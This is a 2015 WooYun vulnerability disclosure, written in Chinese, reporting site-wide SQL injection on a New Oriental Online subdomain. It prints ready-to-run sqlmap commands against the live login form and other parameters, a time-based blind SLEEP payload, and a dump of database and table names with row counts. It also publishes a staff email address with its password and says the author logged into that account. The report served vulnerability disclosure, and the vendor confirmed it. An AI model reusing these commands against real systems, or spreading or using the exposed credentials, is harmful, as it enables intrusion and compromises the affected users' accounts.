当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158343

漏洞标题:新东方在线某子域名全站式注入

相关厂商:新东方

漏洞作者: hecate

提交时间:2015-12-04 19:45

修复时间:2016-01-19 00:50

公开时间:2016-01-19 00:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-05: 厂商已经确认,细节仅向厂商公开
2015-12-15: 细节向核心白帽子及相关领域专家公开
2015-12-25: 细节向普通白帽子公开
2016-01-04: 细节向实习白帽子公开
2016-01-19: 细节向公众公开

简要描述:

全站式就是到处都是注入

详细说明:

地址 http://tb.koolearn.com/ 登录框处

sqlmap -u "http://tb.koolearn.com/index/lsub?username=a&password=s&checkbox=0"


Parameter: username (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: username=a' AND (SELECT * FROM (SELECT(SLEEP(5)))sMNR) AND 'cOLF'='cOLF&password=s&checkbox=0
---
[23:36:47] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.5.12
back-end DBMS: MySQL 5.0.12


available databases [3]:
[*] information_schema
[*] tbl
[*] test
Database: tbl
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| tbl_transaction | 273227 |
| tbl_remind_push | 71005 |
| tbl_user_study | 60076 |
| tbl_course | 57141 |
| tbl_review | 26566 |
| tbl_stulist | 22945 |
| tbl_code | 22510 |
| tbl_study | 14302 |
| tbl_user | 14280 |
| zxzbcar_push | 12867 |
| tbl_message | 10300 |
| tbl_classlist | 5154 |
| tbl_user_dream | 5105 |
| tbl_answers | 3214 |
| tbl_title | 3064 |
| tbl_review_unlock | 1757 |
| tbl_class_resource | 1750 |
| tbl_bind | 1112 |
| tbl_teacher_point | 985 |
| tbl_finance | 879 |
| tbl_english_answers | 877 |
| tbl_english_record | 810 |
| tbl_finance_wj | 776 |
| tbl_upaudiofile | 774 |
| tbl_admin_class | 554 |
| tbl_efficiency | 517 |
| tbl_knowledge | 416 |
| admin_roles | 410 |
| tbl_english_upaudiofile | 398 |
| tbl_admin | 380 |
| tbl_finance_drop | 371 |
| tbl_english_title | 272 |
| tbl_messagetext | 245 |
| tbl_composition | 209 |
| tbl_coin_log | 194 |
| tbl_push | 142 |
| tbl_knowledge_msg | 73 |
| tbl_advice | 65 |
| tbl_menu | 65 |
| tbl_morn_read | 52 |
| tbl_schoollist | 50 |
| goolen3 | 48 |
| tbl_english_scene | 32 |
| tbl_province | 31 |
| tbl_english_mate | 29 |
| tbl_buffey_column_video | 22 |
| tbl_coins | 21 |
| tbl_buffey_column_review | 13 |
| tbl_english_resource | 13 |
| tbl_resources | 9 |
| tbl_buffey_column_name | 8 |
| tbl_bind_vir | 4 |
| tbl_roles | 3 |
| tbl_roles_ctrl | 3 |
| tbl_advice_reply | 1 |
| tbl_sign | 1 |
| tbl_version | 1 |
+--------------------------+---------+

漏洞证明:

大多数密码都是 123456,随便登录一个

liyuan26@xdf.cn  密码123456


2.png

靓!
存在多个注入点

sqlmap -u "http://tb.koolearn.com/teachmanage/intoclass/classid/3728*/resource_id/33201*/unit_id/166251*" --cookie="填上cookie"
参数 classid,resource_id,unit_id均可注入


injection.png

修复方案:

过滤

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-05 00:44

厂商回复:

谢谢漏洞提供,我们会尽快处理!

最新状态:

暂无